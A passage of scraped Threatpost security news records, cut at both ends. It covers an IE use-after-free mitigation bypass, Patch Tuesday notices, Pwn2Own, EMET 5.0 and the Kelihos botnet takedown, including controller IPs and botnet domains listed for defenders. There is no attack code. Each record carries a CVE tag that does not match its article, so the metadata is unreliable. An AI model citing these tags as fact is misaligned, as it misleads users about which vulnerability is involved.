either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-live type and can basically upgrade it to an existing attack to bypasses these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. \u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:45", "description": "Microsoft made patch news on two fronts last month with an unusual [emergency patch for a critical vulnerability in Kerberos](<http://threatpost.com/microsoft-to-release-critical-out-of-band-windows-patch/109433>), and for a missing fix for an Exchange bug that was promised in its November advanced notification.\n\nIn the [December advance notification](<https://technet.microsoft.com/library/security/ms14-dec>), released today, an elevation privilege bug in Exchange is listed among seven scheduled bulletins to be pushed out next Tuesday. The Exchange patch is rated important, one of four bulletins so rated by Microsoft; the remaining three are rated critical, meaning the likelihood of remote code execution and imminent exploit is high.\n\nExpect the Exchange patch to be MS14-075. The patch applies to Microsoft Exchange Server 2007 SP3, Exchange Server 2010 SP3, Exchange Server 2013 SP1 and Exchange Server 2013 Cumulative Update 6. No further details were made available by Microsoft.\n\nThe three critical bulletins expected next week are topped off by another Internet Explorer rollup. The IE vulnerabilities addressed are rated moderate for IE 6, IE 7 and IE 8 running on Windows Server 2003 and Windows Server 2008. They are rated critical for remote code execution on Vista, Windows 7, Windows 8 and 8.1 for IE 7 and up.\n\nAnother critical remote code execution bulletin is expected in Office software starting with Microsoft Word 2007 SP 3, as well as Microsoft Office 2010 SP 2, Word 2010 SP 2, Word 2013 and Word 2013 RT. Microsoft Office for Mac 2011 is also vulnerable, as is Microsoft Word Viewer and Microsoft Office Compatibility Pack. Microsoft SharePoint Server 2010, 2013, and Microsoft Office Web apps 2010 and 2013 are also covered by this bulletin, but those vulnerabilities are rated important.\n\nTwo other bulletins patch remote code execution vulnerabilities in Office, but are rated important, meaning there is some mitigating circumstance, for example, an attacker would need local access or legitimate credentials exploit the flaw.\n\n\u201cWith the balance of next week\u2019s bulletins impacting Windows, December will be a month for IT to focus on the desktop,\u201d said Russ Ernst of Lumension.\n\nThe final critical bulletin covers remote code execution vulnerabilities in Windows Vista. The flaw is rated important for all other Windows Server versions. Windows Server 2003 users, meanwhile, are on notice that support runs out for the platform July 14, 2015.\n\nAs the year winds down, the number of critical bulletins is down. Microsoft is on track for 29 critical bulletins this year, compared to 42 last year, and 35 the year before. IT shops will have 83 bulletins to contend with this year, down from 105 in 2013, Lumension said.\n", "cvss3": {}, "published": "2014-12-04T14:04:03", "type": "threatpost", "title": "December 2014 Microsoft Patch Tuesday Advance Notification", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-12-09T21:46:18", "id": "THREATPOST:FFB8302BEBD76DDACC5FD08D3FF8F883", "href": "https://threatpost.com/missing-exchange-patch-expected-among-december-patch-tuesday-bulletins/109722/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:34", "description": "[![IE9 bugs](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065313/ie9_bugs.jpg)](<https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/>)The same team from VUPEN that took down Google Chrome on Wednesday has succeeded in compromising Internet Explorer 9 on Windows 7, using two separate bugs. The success at the Pwn2Own contest was the result of a heap overflow bug in IE as well as a separate bug in the browser\u2019s protected mode.\n\nThe heap overflow vulnerability exists in many versions of IE, from version 6 through IE 10, which is in consumer preview right now. Chaouki Bekrar of VUPEN said that the compromise of IE was quite challenging and that it took two of his team members about six weeks of work to find the bugs and make the exploits work.\n\nThe bug that enabled the team to break out of IE\u2019s protected mode\u2013which is analogous to the sandbox in Google Chrome\u2013is a memory corruption flaw in protected mode itself. As part of the Pwn2Own contest rules, VUPEN will turn over the heap overflow details to TippingPoint, which runs the contest, and they will then pass the information on to Microsoft. The protected mode bypass, however, will stay in VUPEN\u2019s hands.\n\nThe VUPEN team has a large lead in the Pwn2Own contest, after compromising Chrome and IE, as well as writing exploits for several of the public vulnerabilities that TippingPoint handed out at the beginning of the competition. However, another team comprising two former winners, Vincenzo Iozzo and Willem Pinckaers, also has entered the contest. Still, Bekrar said his team didn\u2019t necessarily need to use the IE bugs.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065311/vupen_pwn.jpg)\u201cWe dropped it because we could,\u201d he said.\n\nThe heap overflow bug that VUPEN used to compromise IE enabled the team to get into the browser\u2019s low-integrity area and then they used the memory-corruption flaw in protected mode to get into the high-integrity area.\n\n\u201cThe Chrome sandbox is much harder to escape for us, because we have the bug in protected mode,\u201d Bekrar said.\n\nThe IE bugs enabled the team to bypass ASLR and DEP on Windows, and although the bug also works on IE 10 on Windows 8, Bekrar said that what he\u2019s seen of the forthcoming version of the browser, it will be more difficult to exploit.\n\n\u201cIE 10 is more complicated to exploit because they\u2019ve added some protections to make it harder to use memory leaks and use-after-free bugs,\u201d he said. \u201cI think that will make the prizes [in Pwn2Own] go higher.\u201d\n", "cvss3": {}, "published": "2012-03-08T22:56:42", "type": "threatpost", "title": "IE 9 Falls to Pair of Zero Days at Pwn2Own", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:39", "id": "THREATPOST:D8CDE16C2F1722831D3106563D1F1551", "href": "https://threatpost.com/ie-9-falls-pair-zero-days-pwn2own-030812/76310/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "![Patch Tuesday](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07073225/micro_patch_12.jpg)Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the users\u2019 interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11 and per usual, the company is set to host a [Technnet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": "threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to the prevailing opinion that online crime is a modern day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. \n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the amount by which cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly ratchet up the numbers when they try to scale small survey groups to the overall population. The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. \u201cUpward bias\u201d \u2013 a tendency of overstating a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper issued by Herley and Flor\u00eancio; \u201cSex, Lies and Cyber-crime Surveys\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders were the most victimized by online bank heists. \n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:12", "description": "A [suspicious Windows 7 update](<https://answers.microsoft.com/en-us/windows/forum/windows_7-update/windows-7-update-appears-to-be-compromised/e96a0834-a9e9-4f03-a187-bef8ee62725e?auth=1>) today raised concern on a number of Microsoft and technology forums that the Windows Update service had been compromised. Microsoft, however, cleared the air several hours later admitting that the update was their mistake.\n\n\u201cWe incorrectly published a test update and are in the process of removing it,\u201d said a Microsoft spokesperson\n\nA compromise of such an automated update service would have had devastating results. Automated software update services have long been speculated as a means to spread malware at scale. Attackers or governments that infiltrate something like Windows Update could compromise software updates to the point where such services are no longer trusted, leaving endpoints and servers unpatched and at greater risk.\n\n[![accidental-windows-update](https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2015/09/07002408/accidental-windows-update.jpeg>)\n\nRated important, the mysterious update, purportedly a new language pack, showed up early this morning on home and business users\u2019 machines. The update was 4.3 MB in size and included long, random character file names and redirects to different .mil, .gov and .edu domains\u2014both of which were out of the norm for Windows updates.\n\nThe update has since disappeared from Windows Update, but not before it was pushed mostly to consumers via Windows Update. Some users said the update to install on their machines. Others who successfully installed the update essentially bricked their machines, according to replies on the original Windows 7 forum post.\n\nWindows Update and Windows Server Update Services (WSUS) are especially juicy targets. At Black Hat this summer, researchers Paul Stone and Alex Chapman of Context Information Security of the U.K. demonstrated [weaknesses in WSUS](<https://threatpost.com/manipulating-wsus-to-own-enterprises/114168/>) that are difficult to address and expose any server or desktop using its automated updates to compromise.\n\nJust last week, the _[Washington Post](<https://www.washingtonpost.com/world/national-security/obama-administration-ponders-how-to-seek-access-to-encrypted-data/2015/09/23/107a811c-5b22-11e5-b38e-06883aacba64_story.html>) _reported that the U.S. government explored several approaches that technology providers could implement to cure the [Going Dark crypto issue](<https://threatpost.com/feasible-going-dark-crypto-solution-nowhere-to-be-found/114150/>). Law enforcement and government officials have expressed concern over recent changes from Apple and Google, in particular, to divorce themselves from storing encryption keys. The practice, government says, hinders law enforcement and national security investigations. They suggest, according to the _Post _article, that under a court order, the government could drop spyware on machines via software update services.\n\nAt TrustyCon, a 2014 event adjunct to RSA Conference, ACLU principal technologist Chris Soghoian delivered a talk that also suggested the next wave of [surveillance efforts could target update services](<https://threatpost.com/are-automated-update-services-the-next-surveillance-frontier/104558/>).\n\nSoghoian said his concern is that the government will not only exploit the convenience of these update services offered by most large providers, but also that it will erode the trust users have in the services leaving them vulnerable to cybercrime, identity theft and fraud.\n\n\u201cThere are really sound security reasons why we want automatic security updates. If consumers have to do work to get updates, they won\u2019t, and they will stay vulnerable,\u201d Soghoian said in 2014. \u201cWhat that means though is giving companies root on our computers\u2014and we really don\u2019t know what\u2019s in the code after fact. This is a point of leverage the government can use. We have no evidence they are using it right now, but these companies have a position of power over our devices that is unparalleled.\u201d\n", "cvss3": {}, "published": "2015-09-30T15:22:01", "type": "threatpost", "title": "Mystery Windows 7 Update An Accidental Test Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-02T16:00:39", "id": "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "href": "https://threatpost.com/suspicious-windows-7-update-actually-an-accidental-microsoft-test-update/114860/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:09", "description": "Microsoft announced today that they will be shipping three critical and five important bulletins in the May edition of patch Tuesday.\n\nAll of the \u2018critical\u2019 bulletins and two of the \u2018important\u2019 bulletins fix vulnerabilities that could otherwise lead to remote code execution. The two remaining \u2018important\u2019 bulletins could lead to an elevation of privilege if unpatched.\n\nThe affected software includes, Microsoft Office, Windows, .NET Framework, and Silverlight. The bugs that will be fixed this month will affect all of the current versions of Windows.\n\nThe official bulletins will be released on [the TechNet Blog](<http://technet.microsoft.com/en-us/security/bulletin/ms12-may>) Tuesday, May 8, and Microsoft will host a webcast to discuss the fixes the following day, May, 9, at 11 AM PST.\n", "cvss3": {}, "published": "2012-05-03T18:28:56", "type": "threatpost", "title": "Patch Tuesday Advance Notification: May Edition", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:35", "id": "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "href": "https://threatpost.com/patch-tuesday-advance-notification-may-edition-050312/76522/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:19", "description": "SAN FRANCISCO \u2013 Enterprises beat up by wave after wave of Java exploits and calls to disable the platform may soon have some relief in sight.\n\nMicrosoft\u2019s free Enhanced Mitigation Experience Toolkit will soon have a new feature that allows users to configure where plug-ins, especially those targeted by hackers such as Java and Adobe Flash, are allowed to run by default. The feature is called Attack Surface Reduction, and it\u2019s one of two that Microsoft has made available in a [technical preview of EMET 5.0](<http://blogs.technet.com/b/srd/archive/2014/02/21/announcing-emet-5-0-technical-preview.aspx>) released today at RSA Conference 2014.\n\n\u201cASR is going to help a lot of people,\u201d said Microsoft software security engineer Jonathan Ness.\n\nBlocking Java outright, despite some of the dire attacks reported during the past 15 months, isn\u2019t an option for most companies that have built custom Java applications for critical processes such as payroll or human resources. With 5.0, users will have the option to run plug-ins in the Intranet zone while blocking them in the browser\u2019s Internet zone, or vice-versa.\n\n\u201cIt gives customers more control over how plug-ins are loaded into applications,\u201d said Ness, explaining users will have the flexibility, for example, to allow Flash to load in a browser, but block it in an Office application such as Word or Excel. A number of advanced attacks have contained malicious embedded Flash files inside benign Word documents or Excel spreadsheets. Microsoft hopes to use feedback received on the Technical Preview to shape the final 5.0 product.\n\n\u201cFeedback is really valuable, and has helped shape this tool,\u201d Ness said, adding that the release of EMET 4.1 was delayed right before launch to correct a shortcoming pointed out by a beta user. The customer was not pleased with EMET\u2019s automatic termination of applications upon detecting an exploit, rather than having a configuration option available where the event could be logged an analyzed later.\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming exploits, in addition to memory-based mitigations ASLR, DEP, heap spray and SEHOP protections. EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe second new feature in the EMET 5.0 Technical Preview is a number of enhanced capabilities to Export Address Table Filtering, or EAF+. Ness said EAF+ blocks how shellcode calls are made into EA table filtering.\n\n\u201cWith OS functions such as open file or create process, exported code wants to jump into EAF. This filters the shellcode and blocks it if it\u2019s an exploit,\u201d Ness said. \u201cWe\u2019re extending that with new filtering (KERNELBASE exports and additional integrity checks on stack registers and limits).\u201d\n\nEMET raises development costs for exploit writers with its memory protections, so much so that the recent Operation SnowMan APT attack included a module that detected whether an EMET library was present and if so, the exploit would not execute itself. Researchers have developed bypasses of EMET\u2019s mitigations, first Aaron Portnoy of Exodus Intelligence last summer, and most recently, researchers at Bromium Labs who developed a complete EMET bypass.\n\nMicrosoft\u2019s Ness said improvements to EMET\u2019s Deep Hooks API protections have been rolled into the 5.0 Technical Preview that address the Bromium bypass. Whether it remains on by default in the final 5.0 remains to be seen as application compatibility issues have to be resolved first, Ness said.\n", "cvss3": {}, "published": "2014-02-25T16:37:11", "type": "threatpost", "title": "Microsoft EMET 5.0 Technical Preview Released", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-25T21:37:11", "id": "THREATPOST:FD699B5CBB882E8FB3DDF3341B557D27", "href": "https://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Earlier this week, Microsoft released a**[![Tillmann Werner](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064459/tillman_0.jpg)](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>)**n announcement about the disruption of a dangerous botnet that was responsible for spam messages, theft of sensitive financial information, pump-and-dump stock scams and distributed denial-of-service attacks.\n\nKaspersky Lab played a critical role in this botnet takedown initiative, leading the way to reverse-engineer the bot malware, crack the communication protocol and develop tools to attack the peer-to-peer infrastructure. We worked closely with Microsoft\u2019s Digital Crimes Unit (DCU), sharing the relevant information and providing them with access to our live botnet tracking system.\n\nA key part of this effort is the sinkholing of the botnet. It\u2019s important to understand that the botnet still exists \u2013 but it\u2019s being controlled by Kaspersky Lab. In tandem with Microsoft\u2019s move to the U.S. court system to disable the domains, we started to sinkhole the botnet. Right now we have 3,000 hosts connecting to our sinkhole every minute. This post describes the inner workings of the botnet and the work we did to prevent it from further operation.\n\nLet\u2019s start with some technical background: Kelihos is Microsoft\u2019s name for what Kaspersky calls Hlux. Hlux is a peer-to-peer botnet with an architecture similar to the one used for the Waledac botnet. It consists of layers of different kinds of nodes: controllers, routers and workers. Controllers are machines presumably operated by the gang behind the botnet. They distribute commands to the bots and supervise the peer-to-peer network\u2019s dynamic structure. Routers are infected machines with public IP addresses. They run the bot in router mode, host proxy services, participate in a fast-flux collective, and so on. Finally, workers are infected machines that do not run in router mode, simply put. They are used for sending out spam, collecting email addresses, sniffing user credentials from the network stream, etc. A sketch of the layered architecture is shown below with a top tier of four controllers and worker nodes displayed in green.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07064456/comeon.jpg)\n\n_Figure 1: Architecture of the Hlux botnet_\n\n**Worker Nodes**\n\nMany computers that can be infected with malware do not have a direct connection to the Internet. They are hidden behind gateways, proxies or devices that perform network address translation. Consequently, these machines cannot be accessed from the outside unless special technical measures are taken. This is a problem for bots that organize infected machines in peer-to-peer networks as that requires hosting services that other computers can connect to. On the other hand, these machines provide a lot of computing power and network bandwidth. A machine that runs the Hlux bot would check if it can be reached from the outside and if not, put itself in the worker mode of operation. Workers maintain a list of peers (other infected machines with public IP addresses) and request jobs from them. A job contains things like instructions to send out spam or to participate in denial-of-service attacks. It may also tell the bot to download an update and replace itself with the new version.\n\n**Router Nodes**\n\nRouters form some kind of backbone layer in the Hlux botnet. Each router maintains a peer list that contains information about other peers, just like worker nodes. At the same time, each router acts as an HTTP proxy that tunnels incoming connections to one of the Controllers. Routers may also execute jobs, but their main purpose is to provide the proxy layer in front of the controllers.\n\n**Controllers**\n\nThe controller nodes are the top visible layer of the botnet. Controllers host a nginx HTTP server and serve job messages. They do not take part in the peer-to-peer network and thus never show up in the peer lists. There are usually six of them, spread pairwise over different IP ranges in different countries. Each two IP addresses of a pair share an SSH RSA key, so it is likely that there is really only one box behind each address pair. From time to time some of the controllers are replaced with new ones. Right before the botnet was taken out, the list contained the following entries:\n\n193.105.134.189 \n193.105.134.190 \n195.88.191.55 \n195.88.191.57 \n89.46.251.158 \n89.46.251.160\n\n**The Peer-to-Peer Networks**\n\nEvery bot keeps up to 500 peer records in a local peer list. This list is stored in the Windows registry under HKEY_CURRENT_USERSoftwareGoogle together with other configuration details. When a bot starts on a freshly infected machine for the first time, it initializes its peer list with some hard-coded addresses contained in the executable. The latest bot version came with a total of 176 entries. The local peer list is updated with peer information received from other hosts. Whenever a bot connects to a router node, it sends up to 250 entries from its current peer list, and the remote peer send 250 of his entries back. By exchanging peer lists, the addresses of currently active router nodes are propagated throughout the botnet. A peer record stores the information shown in the following example:\n\nm_ip: 41.212.81.2 \nm_live_time: 22639 seconds \nm_last_active_time: 2011-09-08 11:24:26 GMT \nm_listening_port: 80 \nm_client_id: cbd47c00-f240-4c2b-9131-ceea5f4b7f67 \nThe peer-to-peer architecture implemented by Hlux has the advantage of being very resilient against takedown attempts. The dynamic structure allows for fast reactions if irregularities are observed. When a bot wants to request jobs, it never connects directly to a controller, no matter if it is running in worker or router mode. A job request is always sent through another router node. So, even if all controller nodes go off-line, the peer-to-peer layer remains alive and provides a means to announce and propagate a new set of controllers.\n\n**The Fast-Flux Service Network**\n\nThe Hlux botnet also serves several fast-flux domains that are announced in the domain name system with a TTL value of 0 in order to prevent caching. A query for one of the domains returns a single IP address that belongs to an infected machine. The fast-flux domains provide a fall-back channel that can be used by bots to regain access to the botnet if all peers in their local list are unreachable. Each bot version contains an individual hard-coded fall-back domain. Microsoft unregistered these domains and effectively decommissioned the fall-back channel. Here is the set of DNS names that were active before the takedown \u2013 in case you want to keep an eye on your DNS resolver. If you see machines asking for one of them, they are likely infected with Hlux and should be taken care of.\n\nhellohello123.com \nmagdali.com \nrestonal.com \neditial.com \ngratima.com \npartric.com \nwargalo.com \nwormetal.com \nbevvyky.com \nearplat.com \nmetapli.com\n\nThe botnet further used hundreds of sub-domains of ce.ms and cz.cc that can be registered without a fee. But these were only used to distribute updates and not as a backup link to the botnet.\n\n**Counteractions**\n\nA bot that can join the peer-to-peer network won\u2019t ever resolve any of the fall-back domains \u2013 it does not have to. In fact, our botnet monitor has not logged a single attempt to access the backup channel during the seven months it was operated as at least one other peer has always been reachable.\n\nThe communication for bootstrapping and receiving commands uses a special custom protocol that implements a structured message format, encryption, compression and serialization. The bot code includes a protocol dispatcher to route incoming messages (bootstrap messages, jobs, SOCKS communication) to the appropriate functions while serving everything on a single port. We reverse engineered this protocol and created some tools for decoding botnet traffic. Being able to track bootstrapping and job messages for a intentionally infected machine provided a view of what was happening with the botnet, when updates were distributed, what architectural changes were undertaken and also to some extend how many infected machines participate in the botnet.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053009/2_4.jpg)\n\n_Figure 2: Hits on the sinkhole per minute_\n\nThis Monday, we started to propagate a special peer address. Very soon, this address became the most prevalent one in the botnet, resulting in the bots talking to our machine, and to our machine only. Experts call such an action sinkholing \u2013 bots communicate with a sinkhole instead of its real controllers. At the same time, we distributed a specially crafted list of job servers to replace the original one with the addresses mentioned before and prevent the bots from requesting commands. From this point on, the botnet could not be commanded anymore. And since we have the bots communicating with our machine now, we can do some data mining and track infections per country, for example. So far, we have counted 49,007 different IP addresses. Kaspersky works with Internet service providers to inform the network owners about the infections.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07052559/3_21.jpg)\n\n_Figure 3: Sinkholed IP addresses per country_\n\n**What now?**\n\nThe main question is now: what is next? We obviously cannot sinkhole Hlux forever. The current measures are a temporary solution, but they do not ultimately solve the problem, because the only real solution would be a cleanup of the infected machines. We expect that the number of machines hitting our sinkhole will slowly lower over time as computers get cleaned and reinstalled. Microsoft said their Malware Protection Center has added the bot to their Malicious Software Removal Tool. Given the spread of their tool this should have an immediate impact on infection numbers. However, in the last 16 hours we have still observed 22,693 unique IP addresses. We hope that this number is going to be much lower soon.\n\nInterestingly, there is one other theoretical option to ultimately get rid of Hlux: we know how the bot\u2019s update process works. We could use this knowledge and issue our own update that removes the infections and terminates itself. However, this would be illegal in most countries and will thus remain theory.\n\n_Tillmann Werner is a senior malware analyst at Kaspersky Lab._\n", "cvss3": {}, "published": "2011-09-29T15:10:41", "type": "threatpost", "title": "The Inside Story of the Kelihos Botnet Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-05-01T20:51:46", "id": "THREATPOST:E77302403616F2E9A6C7DA2AD2B1F880", "href": "https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/75703/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:05", "description": "[From eWEEK (Brian Prince)![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07053737/windows_7.jpg)](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>)\n\nAttackers pushing pirated, malware-laced copies of Microsoft\u2019s upcoming Windows 7 operating system have been actively trying to build a botnet.\n\nAccording to researchers at Damballa, attackers hid a Trojan inside of pirated copies of the operating system and began circulating them on BitTorrent sites. Damballa reported that it shut down the botnet\u2019s command and control server May 10, but by that time infection rates had risen as high as 552 users per hour. [Read the full story](<http://www.eweek.com/c/a/Security/Pirated-Windows-7-Builds-a-Botnet-With-Trojan-456054/>) [eweek.com]\n", "cvss3": {}, "published": "2009-05-12T22:23:28", "type": "threatpost", "title": "Pirated Windows 7 builds botnet with Trojan", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:12", "id": "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "href": "https://threatpost.com/pirated-windows-7-builds-botnet-trojan-051209/72691/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL solider from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI who had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to 